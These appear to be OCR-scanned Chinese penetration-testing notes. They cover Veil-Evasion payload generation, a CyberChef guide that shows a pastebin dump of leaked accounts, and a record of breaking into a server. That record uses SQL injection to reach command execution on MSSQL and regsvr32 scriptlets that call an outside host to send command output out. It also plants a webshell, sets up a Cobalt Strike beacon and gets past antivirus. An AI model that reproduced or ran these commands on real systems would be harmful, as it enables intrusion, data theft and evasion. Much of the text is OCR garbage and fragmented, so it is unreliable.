#deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib 
#deb-sre http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib 
# 官 方 源 

deb http://http.kali.org/kali kali-rolling main non-free contrib 

deb-src http://http.kali.org/kali kali-rolling main non-free contrib 

# 重 庆 大 学 

#deb http://http.kali.org/kali kali-rolling main non-free contrib 

4deb-src http://http.kali.org/kali kali-rolling main non-free contrib 
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rootqJohn:~# cat /etc/apt/sources, list 

sc RK 

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
deb-src http: //mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
sper = ë 


-free contrib 
non-free contrib 


&deb http: //mirrors. tuna. tsinghua.edu.cn/kali kali-rolling main contrib non-free 
#deb-sre https: //mirrors. tuna. tsinghua.edu.cn/kali kali-rolling main contrib non-free 
# К 
s&deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free 

src http: //mirrors.zju.edu.cn/kali kali-rolling main contrib non-free 


#B ï 
deb | 


# 重 庆 太 

#deb http://http.kall.org/kall kali-rolling main non-free contrib 
sdeb-src http: //http.kali.org/kali kali-rolling main non-free contrib 
reots John: ~# 





root@John:~/Desktop# apt-get install veil-evasion 


由 于 在 实验 中 本 机 已 经 安装 ， 所 以 我 们 在 虚拟 机 中 使 用 git 方 式 来 下 载 和 安装 。 (以 便 截 图 ) 


ps: 本 次 kali 下 截图 使 用 scrot 


root@John:~/Deskto# apt-get install scrot 
root@John:~/Deskto# scrot -s / / Та) 
root@John:~/Deskto# git clone https://github.com/Veil-Framework/Veil-Evasion.git 


> 


t in:~# git clone https://github.com/Veil-Framework/Veil-Evasion.git 
loning into 'Veil-Evasion'... 
remote: Counting objects: 3809, done. 
remote: Total 3809 (delta 0), reused 0 (delta 0), pack-reused 3809 


eceiving objects: 100% (3809/3809), 241.90 MiB | 143.00 KiB/s, done. 
esolving an 100% (2137/2137), done. 
John:-# 





root@John:-/Veil-Evasion# ./setup.sh / жак 


:~/Veil-Evasion/setup# ./setup.sh 


[I] Kali Linux "2017.1" x86_64 detected... 


[?] Are you sure you wish to install Veil-Evasion? 


Continue with installation? ([y]/[s]ilent/[N]o}): у 
[+] Initializing package installation 


[*] Adding x86 architecture to x86 64 system for Wine 


Libpangoft2-1.0-0:1386 (1.40.12-1) ... 
Libxcb-syncl:i386 (1.12-1) ... 
Libsndfilel:i386 (1.0.28-4) ... 
1965-va-driver:amd64 (2.0.0«dfsgl-1) . 
i965-va-driver:i386 (2.0.0+dfsgl-1) ... 
python-gdal (2.2.2+dfsg-1) ... 
libqgis-core2.14.20 (2.14.20+dfsg-1) ... 
libldap-2.4-2:amd64 (2.4.45+dfsg-1) ... 
Libldap-2.4-2:1386 (2.4.45+dfsg-1) 
Llibswscale4:amd64 (7:3.4-3) ... 
mesa-va-drivers:amd64 (17.2.5-1) 
mesa-va-drivers:i1386 (17.2.5-1) ... 
libpostproc54:amd64 (7:3.4-3) ... 
1ірхсотроѕіїе1:1386 (1:0.4.4-2) ... 
libxcb-shm0:i386 (1.12-1) ... 
libxrender1:i386 (1:0.9.10-1) ... 
libqgis-gui2.14.20 (2.14.20+dfsg-1) 
libavahi-client3:amd64 (0.7-3) ... 
libavahi-client3:i386 (0.7-3) .. 
libkrb5-3:amd64 (1.15.2-2) 
libkrb5-3:1386 (1.15.2-2) : 
libegl-mesa0:amd64 (17.2.5-1) ... 
libwine:amd64 (2.0.3-1) .. 
gdal-bin (2.2.2+dfsg-1) . 
libglx-mesa0:amd64 (17.2.5-1) ... 
pulseaudio (11.1-1) . 

Installing new version of config file /etc/pulse/daemon.conf ... 

Installing new version of config file /etc/xdg/autostart/pulseaudio.desktqd 

M" ves 

Setting up libgstreamer-plugins-basel.0-0:i386 (1.12.3-1) ... 

Setting up libpangol.0-0:amd64 (1.40.12-1) ... 

Setting up librsvg2-2:amd64 (2.40.18-2) .. 

Setting up libavresample3:amd64 (7:3.4-3) . 





“www. vell-framework,com 


Main Menu 


51 payloads loaded 


available Commands: 


use 
info 
list 
update 
clean 
checkvt 
exit 


[menu>>]: H 
以 c/meterpreter/rev_tcp 为 例 
Payload: c/meterpreter/ 


Required Options: 
Name 


COMPILE TO EXE 
LHOST 
LPORT 


дуа11аб1е Commands: 


Set 

info 
options 
generate 
back 
exit 


[c/meterpreter/rev tcp» 
[1] LHOST => 192.168.1. 
[c/meterpreter/rev tcp» 
[1] LPORT => 8080 

[c/meterpreter/rev tcp» 


Use a specific payload 

Information on a specific payload 

List available payloads 

Update Veil-Evasion to the latest version 
Clean out payload folders 
Check payload hashes vs. 
Exit Veil-Evasion 


YirusTotal 


rev tcp loaded 


Current Value Description 

Compile to an executable 

IP of the Metasploit handler 
Port of the Metasploit handler 


et a specific option value 

how information about the payload 
how payload's options 

Generate payload 

Go to the main menu 

exit Veil-Evasion 


S 
9 
E 


set LHOST 192.168.1.111 


1 


>] 
11 
>] 


set LPORT 8080 


>]; 





Payload information: 
Name: 
Language: 
Rating: 
Description: 


Required Options: 


Name 


COMPILE TO EXE 
LHOST 
LPORT 





ГІ 可 支持 生成 payloads: 


c/meterpreter/rev tcp 

ч E 

Excellent 

pure windows/meterpreter/reverse tcp stager, no 
shellcode 


Current Value Description 
Compile to an executable 


IP of the Metasploit handler 
Port of the Metasploit handler 
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b 1 auxiliary/coldwar wrapper 
2) auxiliary/macro converter 
3) auxiliary/pyinstaller wrapper 


4) c/meterpreter/rev http 


5) c/meterpreter/rev http service 
6) c/meterpreter/rev tcp 
7) c/meterpreter/rev_tcp_service 


8) c/shellcode_inject/flatc 


9) cs/meterpreter/rev_http 

10) cs/meterpreter/rev_https 

11) cs/meterpreter/rev_tcp 

12) cs/shellcode_inject/base64_substitution 
13) cs/shellcode inject/virtual 


14) go/meterpreter/rev http 

15) go/meterpreter/rev https 
16) go/meterpreter/rev tcp 

17) go/shellcode inject/virtual 


18) native/backdoor factory 
19) native/hyperion 
20) native/pe scrambler 


21) perl/shellcode inject/flat 


22) powershell/meterpreter/rev http 

23) powershell/meterpreter/rev https 

24) powershell/meterpreter/rev tcp 

25) powershell/shellcode inject/download virtual 

26) powershell/shellcode inject/download virtual https 
27) powershell/shellcode inject/psexec virtual 

28) powershell/shellcode inject/virtual 


29) python/meterpreter/bind tcp 

30) python/meterpreter/rev http 

31) python/meterpreter/rev http contained 

32) python/meterpreter/rev https 

33) python/meterpreter/rev https contained 

34) python/meterpreter/rev tcp 

35) python/shellcode inject/aes encrypt 

36) python/shellcode inject/aes encrypt HTTPKEY Request 
37) python/shellcode inject/arc encrypt 

38) python/shellcode inject/base64 substitution 
39) python/shellcode inject/des encrypt 

40) python/shellcode inject/download inject 

41) python/shellcode inject/flat 
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42) 
43) 
44) 


45) 
46) 
47) 
48) 
49) 
50) 
51) 


python/shellcode inject/letter substitution 


a : - i 
python/shellcode inject/pidinject 


python/shellcode inject/stallion 


ruby/meterpreter/rev http 
ruby/meterpreter/rev http contained 
ruby/meterpreter/rev https 
ruby/meterpreter/rev https contained 
ruby/meterpreter/rev tcp 
ruby/shellcode inject/base64 
ruby/shellcode inject/flat 
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离线 CyberChef 使 用 指南 
”CyberChef 是 一 个 简单 ， 直 观 的 Web 应 用 程序 ， 用 于 日 常 编码 (例如 XOR 或 Base64) ， 更 复杂 的 加 


密 (例如 AES，DES 和 Blowfish) ， 创 建 二 进 制 和 十 六 进 制 转 储 ， 数 据 的 压缩 和 解压 缩 ， 计 算 哈 希 
和 校 验 和 ，IPv6 和 X.509 解 析 ， 更 改 字符 编码 等 等 。 


”即使 不 是 专业 的 技术 分 析 人 员 ， 也 可 以 快速 上 手 ， 同 时 支持 下 载 离 线 版 本 。 


https://gchq. git 


| --. powershellfi£f3(base64) 


某 次 事件 应 急 提取 的 powershell 混 淆 脚本 : 
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*d/3mSOd2Unvdq*OFog63IXt-r5salTv8BJZSpGR5FG/f3j/ ^L 
21n6k892Wi79k8F7LEw^nDIySBXRQorU7zShhVbFmiZEOwKukO9OdIR6hAn2brL flróneqg [ 
emGRrjSzFDrznRAj6xKZBszfNfK--JpqfnBFdO«7ff2p37T4OHnvh YeGSk2/qhrFDSCwhpdegiQ. 
41D45Ajug1iv8jKbFP 1bJwOr3pmWhnobpIG1J6SiKsqCst2BUBCnQFVdpNTXxPI2BOzbdhuG8y 
Hw2CApUluOudd4 Yvn94--Ad9f/a7tNMKJ6inpBUqsIxHxRP2UdmTVvTQgalk2D6CIVwVOwaAd ` 
OB8SeshjRrbQmpEv9jBlaQ7sLaj*qRL9WAgISVXSekMg3zglmQU3QSbP9RqCnS5HfgOREA, 
kPvzwisP7zexXtpQry3rNFhi9uz+OEURHZz7MSH+W+UkyXUsGPV2XFAaYto6hRS+EFW6oVs 
t3vaw8BuoiCAfmL XsHRvZThAAJVzOILtBIG--b9e/TUkAbnCLhkHoJ9i/Mo9/CGGOIOp6wdxHTICi: 
6fd5AgYAICr2qQa1J9d/UxARXL 7pcjUmACtaHP JUQFaSw89dgTomg20gqogQQOs2Be60N ` 
8B1dpM8cP1y8N3MQavPEK8suNa/hwvldSkceQUGXYtMSn7fYusqOw/a3cNWaVNj3yupi7q 
FzwfHsj8/SsipaH5IGZzfOHPnYIwOUXUrGAelOOgAvfttvAsF7hMATAEtPKAh YaODQq4 Y KBY š 
Qlae/0dFQpSUSQAhL Hey8RL4Rbfqb6kTleilL2v8d3ofKJtw0SFwheRQfp1UlWdSkLFxWuUjw 
bVhkP//NXZeMYBI+gcxroy9245w5Vw+gWNn69VRpCnkE5QIBUcHypyBL OK9HIN6FQJ6F/61I 
hau50L22MIjSsuFxemm5SpqMCG6UumOiKdmFCIAoIQwPShiOK* Y/MAwSIkuyGwh 7K MNq 

5SKKHOHxYBjfRn/ak040wQ9zE8X273CBlwSrkKH3ynzaKWAI34aKIH8ckrkcAzLhBwj8 VOdi 
OTMsKG+kBejgavOPxMOP *uKzsr2i78XP--JoJK/2BqupEzaSZoE0uJKO-nGj78bjqSAe53472 

XziliEXwlOrOwogQbeWcLUruwsqv8OMuXFjT/kiKOFhX8H6a6314BgPAoTLO9fXOsb/zdWlx 
gJGtK2mk+xvekP2E6/ctc6ApGEMGHTP 7ncjsD5YGOtmNISZpAys771s37OdmtFe3Sq1uF4f 
pVhygeHStLjgP7HFgj/14aHJwOvfCxkawm5//G Jj3mDHP vnx9Z UrcAfXCHRbmGgGiXfgM +f 
OLG5rmu?7Bja*XgaQOVHmyOMbiUlvdaBEPyvU2yJinp1pLOREMNFCIXLYaL qf^-*tpaDz TB3 
KrXKM1N1ZQkfaDxzitgbVIK17F1NzNvvWBIRxTmOrxcujalaDH*806C YeGrRkzg300 Y XBwV 
uFwvbJG7taN19Ktq6bqzmeCzrgKuOmKHc2k6MSkyNOSRMWKOTaBGJimIBVWMCLBwBVs 
yRVmYuSozGIYWJNETRRmuYIOXeWOvpWWajkhrg TxmVXIMRHWY8sxhSyi2fuVNx49+y¥ 
ZurHL B4nrzVbO81JwrmyZVLC29w3J 1cbSNSviye7 SPOCBpwrE0Kchqz7y4hFniTNMJpv3d 

WVNtO/9gYkn*yS7WzFA8tnONjaZZKGgQp6SyWiciQuL TOrUGqeZc1Tv31pgkwMugLwJuT T 
PIAC+TBeOg4AvwPmBzGzinRMacAcmdWzsNMRe9IH3twxb1483kincEcO2c9aOkwkDd0s 

UITaWXRz1CI7Nj*aLXjwAPOqawncPX6/hFMuzx1g/lmsmNmHuTUXPITWKESI7 DneWkn6wc3 
K2WAYOITFOO2gj3OWHv9FMp6&drdwUq9/a379pSICUIVaSWgrj6* Ky/eGAtUrysgjUHT gd X* p 
81JWSO0c3+DzDjOZNH/u+ GBUpILA2QWNI1KZcsIZnfNBDHdzOOL6eWoulwTBgOr94cdagXw 
C63xuKy9OWLCA1FCAT7WyNAUpWEVdZn9kGGgT2D2lwbO *eNH47P8QJ9sdZtG44TOI3ly 
NN9pinOrHLH/X9TOb4QlfoL/htq3tf--w*ONIMt3zmf*2/teFn4L1p89ue7gC SR1eaQSdOqq3lT 
hzbFXHCXmB/G/OT/OP YVZXnzToQz-8/xdvjjHhnAwAAA-- 
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То Base64， 多 种 选择 : up -- 
Operations « Recipe | BM Áo i же Mu » [= з ШЖ 


Ades wel 5 (теме 6 
теке мы nil Jovi ронена Ц ае be Lee oe 


让 





Ора ‚єз a В 5mm 





p D 


正则 表达 式 Regular expression 拖 搜 到 空白 处 : 
Recipe nimis 


Operations 


To Base64 


А-2а-:20-9%/- 


转换 
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À ry | 
torem AJ менен нинен енн а нйн éditorial mtn 


二 、 时 区 和 格式 转换 
选择 Translate DateTime Format， 支 持 多 种 类 型 转换 


| 


ж 


=. Exif 提 取 
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选择 Extract EXIF 


war teen * 


IP 格 式 转换 


©! -- 
қыл 
Output 
` 
. ‹ 
whe 
мый 
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Туре тәуусе 
ілезес 100% 
- жұ ume Q u 
L. кА 
« ^ 
bi | " 
AM FEF 8950! he OD Baa 
= 
« а 
е been generate , 


ЖИ Change IP format 





t B av fo 
pm 
cmi 
gere 
六 、IP 子 网 读 取 
选择 Parse IP range 
кескіні кіре ата e 
© a | 
— ac 
ER 
| | 
| 
E 





七 、 数 据 提取 功能 
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(651) 


1: Pastebin.com/raw/A 0 x 

















С“ © pastebin.com 


#gmail.com:gofra 
de: EVRCONVWTLBYBXPKMENNDUX 
pires: Mar 29, 2019 

jato Renewal: Yes 


E @gmail.com:mark 

ode: ECLEQDI1CPM282252A90P40NL 
K : Nov 13, 2018 

huto gen: Yes 

ып coms beck 

: ENPTAAHSPCCNOO68XO7CX7V 
pires: Мау 29, 2018 

Auto Renewal: Yes 

N Égmail.com:PENCU 
| Code: ETMFASRRV7OFH7D6716PROW 
Expires: Jun 23, 2018 

Auto pee Yes 


IE BEL enden 

| Code: EUEFNCRO4381XRPXLTBKJCDJ 

Expires: May 16, 2018 

Auto Renewal: No 

| 1 me mv 

8: @gmail.com:Bbmoo 

| Code: E3SNWXHE3UWOOIAICKSP9OC 

| Expires: Dec 24, 2018 

| Auto Renewal: Yes 

— ы 选择 Extract email addresses 


ingat T fy Cow 


Output 


八 、 下 载 离线 版 本 : (最 新 版 已 更 新 至 9.11) 
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erChef v9.8.0.zip 
b^ e 


zd ЖІГІНЕ RA. 


images 
modules 
© CyberChef v9.8.0.html 


版 选项 配置 


жылан dad “А net aye э% ay * andi a Non a iig ұсы ә prestat etf Съ v © 
жне елен 
ж 


| [==] е» 
PT ы | ms 
— 
lesse төбе that these өр perww Between semens 


айт 


a 


B s 





g 


Place она 


功能 : 将 XOR 模 块 拖 搜 到 Favourites 快 捷 方 式 


Operations Recipe айза кы “өт 





Кесіре 


э м 保存 


1947 


` Recipe [Sima e tl s softs 


Output aoc 


CHEF FORMAT 


NES Encrypt(('option':'Hex','string':''] 
-P'option':'Hex','string':''), CH `, Raw’, Hex’ 


1 Recipe name 





x Data link Ë include recipe ËB] include input x 


HCHEF FORMAT AES_Encrypt({‘option':'Hex’,'string':"},{‘option':'Hex','string':"},'CBC’,'Raw’,'Hex’) 
E 下 次 使 用 时 ， 导 入 CHEF FORMAT 即 可 : 
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AES б» уре 

















Ору! 

Load recipe, Arecipe 

Load recipe 

Re ame 

AES Encrypt(('option': Мех”, : 

('option':'Hex','string':' ty "Ce Қа Hex 

DELETE 
Recipe 成 功 ， 方 便 进 行 特定 格式 筛选 、 输 出 
Operations Recipe Bess a 
AAS taora 

€— * 
[m Ene веба 

fi C рын 
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某 次 项 目 技术 点 实录 -Regsvr32 ole 对 象 

由 于 环境 都 无 法 进行 演示 ， 目 前 取得 都 是 历史 留存 的 截图 

突破 口 

一 开始 是 一 个 外 网 的 SQL 注入 ， 通 过 sqlmap 正 常 操作 ， 得 知 是 DBA 权 限 ， 数 据 库 : MSSQL 


sqlmap.py -u "http://xxx.com/xxx/Xxx.aspx?yumzxx&xx-xx" -p yhm --random-agent -- 


57) [INFO] the back-end DBMS s Microsoft SQL Server 





直接 通过 --os-shell 来 执行 命令 : 





[18:39:23] [INFO] checking if xp cmdshell extended procedure is available, pleas 
xp cmdshell extended procedure does not seem to be available. Do you want sqlmar 
[18:39:25] [WARNING] xp cmdshell re-enabling failed 


ЕНхр cmdshell 
手动 启动 语句 : 


EXEC sp configure 'show advanced options', 1;RECONFIGURE;EXEC sp configure "хр C 


exec master..xp cmdshell "whoami" 


启用 OLE Automation 


[18:47:40] [INFO] checking if xp_cmdshell extended procedure is available, please wait.: 
xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] Y 
118147421. [WARNING] Xp cmdshell re-enabling failed = 


[18147:42] [INEO] creating xp.emdshell with sp_OACreate We 

do you, want sqlmap to try to optimize value(s) for DBMS delay |responses (option 

Lig: 7:55] CINEO] xplomdshetti created successfully — 
1 1551 testing if xp.cmdshell extended procedure is usable 


D 


--time-sec')? [Yn] Y 
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通过 启用 xp_cmdshell 失 败 ，sqlmap 还 会 尝试 sp_oacreate , sp OACreate 这 个 方式 是 不 带 回 
显 的 ， 通 常 利用 语句 如 下 : 


EXEC sp configure 'show advanced options', 1; 
RECONFIGURE WITH OVERRIDE; 
EXEC sp configure 'Ole Automation Procedures', 1; 
RECONFIGURE WITH OVERRIDE; 
EXEC sp configure 'show advanced options', 60; 


1 


declare Qshell int exec sp oacreate 'wscript.shell',Qshell output exec sp oametFl 


b 


os-shell» ipconfig /all 
want to retrieve the command standard output? [Y/n/a] Y 
:26] [INFO] used SQL query returns 1 entry 
:26] [INFO] retrieved: 1 
:26] [INFO] retrieving the length of query output 


261 [INFO] retrieved: 1 
[18:49:26] [INFO] retrieved: 0 
command standard output [1]: 
E 





通过 调用 sp oacreate 能 够 获得 一 个 数字 返回 值 ， 若 全 是 0， 则 执行 失败 ， 必 须 有 1。 


判断 网 络 环境 


能 执行 命令 后 ， 为 了 判断 能 否 出 网 ， 先 尝试 DNS Log。 
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e т қ i ies Burp S it 
74% Project Intruder Repeater Window Help | 


Search Si 
Configuration library 

User options » 
Burp Infiltrator 

Burp Clickbandit 

Burp Collaborator client 


91% -AUUE етт; same © main and URLs in... 745 items added to 





Finished 


all traffic) 











; 4 
Capturing: 345 responses proci 


0 responses queued 
jug 





2. Live audit from Proxy (all traffic) 





Audit checks - passive 


\55иез:@ 3 


Capturing: 41 requests (0 error 








burp сопарогасог cuent 
Q) Click "Copy to clipboard" to generate Burp Collaborator payloads that you can use in your own testing. Any interactic 


below. 
Collaborator payloads 


Number to generate: 1 | Сору to clipboard | М) Include Collaborator server location 


Poll Collaborator interactions 


Poll every 2 seconds | Poll now | 


% А Time Туре Payload Comment 


ft os-shell FB, #17: nslookup xxxxx.net ，burp 看 回 显 即 可 。 
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TQ rem] 


"Ж s Time š. ‘Type Payload | 


“2019-45-19 06:10:51 UTC DNS — 2beawfy895uwnoxmnjrn2gtyspygm5 — 


























| The Collaborator server received a DNS lookup of type A for the domain name 2beawfy895uwnoxmnjrn2gtyspygm5.burpcollaborator.net. 


The lookup was received from IP addresy ш 2019-..-19 06:10:51 UTC. 


DNS 能 出 ， 接 下 来 看 TCP 报 文 . 
这 里 我 使 用 certutil 、 bitsadmin 命令 来 测试 ， 但 是 么 有 截图 .… 


1 $ python3 -m http.server 


n 
М Qs-shell»certutil -urlcache -split -f http://xxx:8000/ 
» 


A 
收 到 相应 的 请 求 后 ， 基 本 上 稳 受 了， 可 以 采用 reverse tcp 的 方案 ， 用 powershell 反 弹 一 个 
‘beacon 到 cobalt strike 上 。 


Regsvr32 妙 用 

antis d 程 中 ， 并 不 顺利 ， 后 来 我 发 现 它 有 反 病 毒 软件 .、 

尝试 了 以 下 方法 : 

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstrinc 
_ regsvr32 /s /n /u /i:http://x.x.0.x:8080/zfgJrh6V.sct scrobj.dll 


 mshta http://Xxx.xx.Xx.xx/1.hta 
Lic қ 


然后 我 发 现 msf exploit/multi/script/web delivery 生成 的 地 址 ， 都 会 在 底层 调用 一 
E powershell 








ER co - ° т © 29 Ф +0 40 
в 0 жан өз ескере ËJ лнн ÜC ШАМ Qa Aeevomebog By NO gu ам 

% 
SIAME versions" isttatlon progide ^iMa2YlsC^ classide" (62d Ad9e-e347-43a0-560d-02005660260d) " »«neript»«!(CDATA| var r > new Activexobject(“WSeript Shell ru СЫҒА hidden -e 
St*nov-objoct. nfo. ia xus equest j: tGetSysteaWebProxy () j $t. Року, Credent аве Net .CredentLaiCa yi 1DefaoltCredentials; IER = et http: //@ Latia e OIM 


ные 
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目前 ， 这 种 download+iex 方 式 肯定 不 行 了 ， 然 后 我 就 改 了 几 个 脚本 ， 通 过 HTTP Log 来 回 显 执行 结 
Ж: 
获取 进程 列表 : 


<?XML version="1.0"?> 
<scriptlet> 
«registration progid="d08c96" classid="{cea46581-c344-4157-b891-30f358f1522¢ 
«script language="vbscript"> 
«![CDATA[ 
Sub getName(name) 
Dim http 
Set http = CreateObject("Msxm12.ServerXMLHTTP") 
http.open "GET", "http://xxx.xxx.xxx.xxx:8086/"+name, False 
http.send 
End Sub 


Sub Cmd(command) 
Set oShell = CreateObject("WScript.Shell") 
Set Re - oShell.Exec(command) 


Do While Not Re.StdOut.AtEndOfStream 
getName Re.StdOut.ReadLine() 

Loop 

End Sub 


Ста "powershell -w hidden -c $s=Get-Process;$process ='';foreach ($n in $s) {$prc 
П> 
</script> 
</registration> 
</scriptlet> 


FATT: 


wmic process call create "regsvr32 /s /n /u /i:http://XXX.XXX.XXX. XXX:8086/p. txt 


4 


os-shell» wmic process call create "сед$уг32 /s /n /u /i:httpt//220.194.156.152:8086/p.txt scrobj.dll" 
do you want to retrieve the command standard output? [Y/n/a] Y 
[19:00:06]. [INFO] used SQL query returns 1 entry 

06] [INFO] retrieved; 1 


06] [INFO] “ving the length of query output 
INFO] eved: 1 
-INFO] retrieved: ¢ 
command standard output [1]: 


ШІ? 
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| AE. 1773072019 17 31:45] “GET /2 eer HTTP/ со 200 


Jul/2019 17:50:04] "GET /2.txt HTTP/1.1" 200 
1/2019 17:50:09] code 404, message File not found 
ыла YAEL СА ША A2 ADAACWBWAGUAZQBKAGWAZABSADMANGAWAHMACAB LAGUAZABSAGQAFA 
AzADYAMABOAHIAYQBSAHwAYwBOAHIAbWBtAGUAfAB jAGgAcgBvAGOAZQB8AGMAGAByAGBAbQB LAHwAYWBOAHIAbwBtAGUAFAB jAGgAcg 
BvAGOAZQBS8AGMAaAByAGBAbQB LAHWAYWBtAGQAFAB jAG8AbgBoAGBACWBOAHwAYwBvAGAAGABvAHMAdABBAGMAbwBuAGgAbwBZAHQAf A 
BjAGBAbgBoAGBAcwBOAHwAYwB vAGA4AaABvAHMAGABBAGMAbWBuAGgAbwB z AHQA AB j AGBAbgBoAGBAcwBOAHwA YWBZAHIACWBZAHWwAYw 
BzAHIACWBZAHWAYwBZ AHTACWB2AHWAYwWBZ AHIACWBZAHwAZAB3AGOAfABKAHCAbQBSAGUAZWB1AGkAfABlAGCAdQBpAHWAZQB rAHTAbg 
BSAEUAWABDAEUATABBAGUAeABWwAGWAbWB yAGUACgB8AGUAeABWAGWADWBYyAGUACGB8AGYAZABOAGSACWBOAHWAZGBKAGWAY QB 1AG4AY 
BoAGUAcGBBAEKAZABSAGUAf ABpAG4AZQBOAGKAbgBmAGBAfAB JAG4AZQBQAEQAZWBy AHWATABVAGCADWBUAFUASQB8AGWACWBhAHMAC 
B8AGWACWBtAHWAbQBKAGOA f ABtAHMAZABOAGMA f ABNAHMARABQAHMAUWBy AHY AcgBBAE@AWABBAGCAZQBUAHQA f ABNAF gAQQBNAGUAbg 
BOAHwAbgByAFMAdgByAHwAbgB yAFMAdgB yAHwAbgB yAFMAdgB yAHWATWBtAG4AaQBBAGQAZAByAFMAZQBYyAHY AaQB j AGUAFABWAG8Ad 
BLAHTACWBOAGUADABSAHWACABVAHCAZQBy AHMAGAB 1 AGWADAB8AHAADWB 3AGUACGBZAGGAZQB SA GWA f ABRAHKAMwB LAE YAdwBGAHMARg 
BmAHWAUQBSADMAZQBGAHcAegBZAE YAZgBBAHIAZABWAGMADABpAHAA f AByAGQACAB j AGWAaQBWAHwAcgB LL AGCACWB2AHIAMWAyAHwAcg 
BLAGCAcwBZAHTAMwAyAHWAcgB LAGCACWBZAHIAMWAyAHwACWB LAH TAdgBpAGMAZQBZAHWACWBtAHMA cwB8AFMATQBTAHYAYWBIAG8Ac 
BOAHWACWBuAGOACABSAFMAbwBmAHQATQBnAHTATABpAHQAZQBSAFMAbWBnAGBSAdQBDAGWAbWB 1AGQAFABZAHAADWBVAGWACWBZAHWAUW 
BRAEWAQQBHAEUATgBUAHwACWBXAGWAY gByAG8AdwBzAGUACgB8AHMACQB sAHMAZQB yAHYAcgB8AHMACQB sAHCAcgBpAHQAZQByAHwAc 
B2AGMAaABvAHMAdABBAHMAdgB j AGgGAbwBz AHQAFABzAHYAYwBoOAGBACWBOAHwACWB2AGMAaABvAHMAdAB8AHMAdgB j AGgAbwBz AHQA fA 
BzAHYAYWBOAGSACWBOAHwACWB 2AGMAaAB vAHMAdAB8AHMAdgB JAGgAbwBzAHQAfABzAHYAYwBoAG8AcwB@AHwAcwB2AGMAqABvAHMAdA 
B8AHMAdgB j AGGAbwBZAHQAFABZAHYAYWBOAG8A cwBOAHwA CWB2AGMAaAB vAHMAdAB8AHMAdgB j AGgAbwBz AHQA f ABTAHKACWBOAGUAbQ 
B8AHQAYQBzAGSAGABvAHMAdABBAHQAYQBzAGSAaGABvAHMAdAB8AHQAYQBzAGsAbQBnAHTAf AB3ADMAdwBWAHwAdwWAZz AHCACABBAH CAM 
B3AHAA f AB3ADMAdwBwAHWwAdwB KAHMAdwBmAHMAYQBmAGUA f AB3AGkAbgBpAG4AaQBOAHwAdwBpAGA4AbAB vAGCAbwBuAHwAdwBpAGA4AbA 


eT Ree een te a т 











base64 





获得 进程 列表 后 ， 看 到 有 EST Nod32 . 360 等 防护 软件 ， 看 来 需要 做 的 工作 有 很 多 。 
JAR: 
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<?XML version="1.0"?> ЕТ”. T » p ve 
«scriptlet» 
«registration progid="do8c96" classid-"(cea46581-C344-4157-b891-30f35811525c 
«script language="vbscript"> 
<! [CDATA[ 
Sub getName(name) 
Dim http 
Set http = CreateObject ("Msxml2.ServerXMLHTTP" ) 
http.open "GET", "һЕср://ххх.ххх.ххх.ххх:8086/"-папе, False 
http.send 
End Sub 


Sub Cmd(command) 
Set oShell = CreateObject("WScript.Shell") 
Set Re = oShell.Exec(command) 


Do while Not Re.StdOut.AtEndOfStream 
getName Re.StdOut.ReadLine() 

Loop 

End Sub 


Ста "powershell -w hidden -c $s=Get-ChildItem D:\web4_new\;$process ='';foreach 
11> 
«/script» 
«/registration» 
«/scriptlet» 


下 载 Webshell: 
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<?XML version="1.0"?> 
<scriptlet> 
«registration progid="d08c96" classid-"[cea46581-c344-4157-b891-30f358f1522C 

«script language="vbscript"> 
<! [СрАТА[ 

Set Shell = CreateObject("Wscript.Shell") 

Set Post = CreateObject("Msxml12.XMLHTTP" ) 

wfolder = "C:\inetpub\wwwroot\xxx\111lenglish.aspx" 

Post.Open "GET","http://XXX.XXXX.XXX.XXx:85/bak/english.txt",0 

Post.Send() 

Set aGet - CreateObject("ADODB.Stream") 

aGet.Mode = 3 

aGet.Type = 1 

aGet .Open( ) 

aGet.Write(Post.responseBody) 


" a wu # ' 7 - 


aGet.SaveToFile wfolder,2 


he 
</script> 
</registration> 
</scriptlet> 


E > 


”通过 指定 不 同 的 txt， 执 行 不 同 的 代码 。 








[Bloc s- ә. "sS EE 
修改 日 期 大 小 种 类 
1.txt 前 天 оғ: ” 纯 文本 文稿 
2.txt 前 天 58070 ” 纯 文本 文稿 
abc.txt 前 天 608 F ” 纯 文本 文稿 
bcd.txt 前 天 576 字 节 ” 纯 文 本 文稿 
down.txt 上 午 11:10 527 515 ” 纯 文本 文稿 
downf.txt .E^F 10:59 547 字 节 ” 纯 文 本 文稿 
> english.aspx 2017/10/26 62 KB  Visua...X f$ 
ftxt 前 天 787 + AMAR 
p.txt 前 天 772 字 节 — "XX 
. Process.jpg 前 天 10 KB  JPEG 图 像 
Win32Project6.dll 前 天 10 KB  Micro...brary 
2017/10/26 3KB  Visua...X f 





当然 ， 毫 无 疑问 的 最 终 获得 了 beacon: 
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noo Be ate Seat Pa ae 
interna 


external pid ast <= 


. Administrator ° w s 3112 848m 


免 杀 环节 就 不 记录 了 。 


asked beacon to list processes 

host called home, sent: 12 bytes 
Process List with process highlighting 
Current Running PID: Yellow 3112 
Explorer/Winlogon: BLU 
Admin Tools: LIGHT BLUE 

Browsers: GREEN 

AV/EDR: 


Мате Arch Session User 


[System Process] 

System 

smss.exe 

фт. exe WIN-KH60010U0CRNAdministrator 


svchost.exe 
svchost.exe 
csrss.exe 
wininit, exe 
csrss.exe 


services.exe 
lsass.exe 
lsm.exe 

576 svchost.exe 


[WIN- j Administrator */3112 
res м С, ы у O 


外 网 多 个 SQL 注入 -SQL Server DBA, ЖІБІ , 360+ESET NOD32 Antivirus，regsvr32 通 过 一 个 
ole 对 象 执行 VBscript， 使 用 --os-shell ， 底 层 执行 的 父 进程 是 一 个 mssql service， 所 以 av 可 能 
不 那么 关注 ， 但 是 通过 --os-shell 直 接 创建 powershell， 就 会 被 拦截 ; 






通过 加 载 我 服务 器 上 的 sct 文 件 ， 执 行 自 定义 的 vbs 之 外 ， 我 发 现 它 不 会 阻止 vps 派生 powershell; 


但 是 通过 vbs 直 接 派生 powershell 下 载 代 码 执行 、 或 直接 反弹 ， 都 被 干掉 。 由 于 没有 回 显 ， 无 法 确定 
